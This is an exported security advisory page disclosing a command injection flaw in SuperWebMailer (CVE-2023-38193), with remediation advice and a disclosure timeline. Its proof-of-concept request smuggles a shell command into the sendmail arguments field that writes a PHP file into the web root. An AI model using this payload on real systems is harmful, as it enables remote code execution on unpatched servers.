{"id":21150,"date":"2023-10-20T15:06:21","date_gmt":"2023-10-20T13:06:21","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=21150"},"modified":"2023-10-23T10:00:48","modified_gmt":"2023-10-23T08:00:48","slug":"usd-2023-0015","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0015\/","title":{"rendered":"usd-2023-0015"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.22.2\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0015 | RCE in SuperWebMailer<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0015
Product<\/strong>: SuperWebMailer
Affected Version<\/strong>: 9.00.0.01710
Vulnerability Type<\/strong>: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
Security Risk<\/strong>: CRITICAL
Vendor URL<\/strong>: https:\/\/www.superwebmailer.de<\/a>
Vendor acknowledged vulnerability<\/strong>: No
Vendor Status<\/strong>: Not fixed
CVE number<\/strong>: CVE-2023-38193
CVE Link<\/strong>: Pending<\/p>\n

Desciption<\/h3>\n

SuperWebMailer is an online application for managing e-mail newsletters. An authenticated command injection vulnerability was discovered during an engagement. In a command injection attack, an attacker provides a malicious input which is passed by the application to the system and then executed.<\/p>\n

The application allows to configure different methods to send outgoing e-mail. One of the available options is to configure sendmail. The user interface provides inputs for the path and the arguments to the sendmail binary. These inputs are accepted from the user without any encoding or filtering being applied. Consequently, an attacker may provide inputs that alter the intended effects of the sendmail command.<\/p>\n

Proof of Concept<\/h3>\n

First, login with a user with the privileges to create or modify \"Versandvarianten\". A new \"Versandvariante\" can be created by navigating to \"Einstellungen -> Versandvarianten -> Neue Versandvariante anlegen\". The following screenshot shows a possible malicious payload that creates a php file in a user-readable location.
\"Screenshot<\/p>\n

The corresponding request is:<\/p>\n

\n
<\/span>POST<\/span> \/mtaedit.php<\/span> HTTP<\/span>\/<\/span>2<\/span>Host<\/span>:<\/span> swm.example.com<\/span>Cookie<\/span>:<\/span> PHPSESSID=8k8n7rmlnugo73d3jjtaeantft; SuperWebMailer=161kd4lr0kv8qplkknm927u0cs; smlswmCsrfToken=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa; ckCsrfToken=owDltMAWfNyS6UeMRck4tE3kPhfh4qaTr6QkSLAQ<\/span>User-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0<\/span>Accept<\/span>:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.5<\/span>Accept-Encoding<\/span>:<\/span> gzip, deflate<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded<\/span>Content-Length<\/span>:<\/span> 556<\/span>smlswmCsrfToken<\/span>=<\/span>20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa<\/span>&<\/span>MTAId<\/span>=<\/span>3<\/span>&<\/span>Name<\/span>=<\/span>sendmail+test<\/span>&<\/span>Type<\/span>=<\/span>sendmail<\/span>&<\/span>MailLimit<\/span>=<\/span>0<\/span>&<\/span>MTASenderEMailAddress<\/span>=<\/span>&<\/span>sendmail_path<\/span>=<\/span>%2Fusr%2Fsbin%2Fsendmail<\/span>&<\/span>sendmail_args<\/span>=<\/span>-i%3B+echo+%27PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D%27+%7C+base64+-d+-+%7C+tee+%2Fvar%2Fwww%2Fhtml%2Fuserfiles%2F2%2Ftest-phpinfo.php%3B+cat<\/span>&<\/span>savetodir_pathname<\/span>=<\/span>&<\/span>SleepInMailSendingLoop<\/span>=<\/span>0<\/span>&<\/span>SMIMEMessageAsPlainText<\/span>=<\/span>1<\/span>&<\/span>SMIMESignCert<\/span>=<\/span>&<\/span>SMIMESignPrivKey<\/span>=<\/span>&<\/span>SMIMESignPrivKeyPassword<\/span>=<\/span>&<\/span>SMIMESignExtraCerts<\/span>=<\/span>&<\/span>DKIMSelector<\/span>=<\/span>&<\/span>DKIMPrivKey<\/span>=<\/span>&<\/span>DKIMPrivKeyPassword<\/span>=<\/span>&<\/span>SubmitBtn<\/span>=<\/span>%C3%84nderungen+speichern<\/span><\/pre>\n<\/div>\n
The payload may be triggered by testing the newly created Versandvariante via the overview screen.
\"Screenshot<\/p>\n
The created file is accessible under the path specified in the payload.
\"Screenshot<\/p>\n
Fix<\/h3>\n
It is recommended that all input to an application is seen as potentially dangerous and thus filter input on the server-side.
Where possible, an allowlist should be used for filtering.
Additionally, it is recommended to utilize a programming language's APIs instead of directly issuing system or shell commands.
Generally, all services should run with minimal required system privileges and users should have minimal required application privileges (least privilege).<\/p>\n
References<\/h3>\n
https:\/\/cwe.mitre.org\/data\/definitions\/77.html<\/a>
https:\/\/owasp.org\/www-community\/attacks\/Command_Injection<\/p>\n
Timeline<\/h3>\n
    \n
  • 2022-09-26<\/strong>: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.<\/li>\n
  • 2023-04-20<\/strong>: First contact request via info@superwebmailer.de.<\/li>\n
  • 2023-05-08<\/strong>: Reminder sent via info@superwebmailer.de and contact form.<\/li>\n
  • 2023-05-15<\/strong>: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.<\/li>\n
  • 2023-05-25<\/strong>: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com<\/li>\n
  • 2023-06-05<\/strong>: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).<\/li>\n
  • 2023-07-17<\/strong>: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.<\/li>\n
  • 2023-08-17<\/strong>: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.<\/li>\n
  • 2023-10-02<\/strong>: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.<\/li>\n
  • 2023-10-20<\/strong>: Vulnerabilities disclosed by usd AG.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2023-0015 | RCE in SuperWebMailer Advisory ID: usd-2023-0015Product: SuperWebMailerAffected Version: 9.00.0.01710Vulnerability Type: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')Security Risk: CRITICALVendor URL: https:\/\/www.superwebmailer.deVendor acknowledged vulnerability: NoVendor Status: Not fixedCVE number: CVE-2023-38193CVE Link: Pending Desciption SuperWebMailer is an online application for managing e-mail newsletters. An authenticated command injection vulnerability was discovered […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21150","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21150"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21150\/revisions"}],"predecessor-version":[{"id":21203,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21150\/revisions\/21203"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}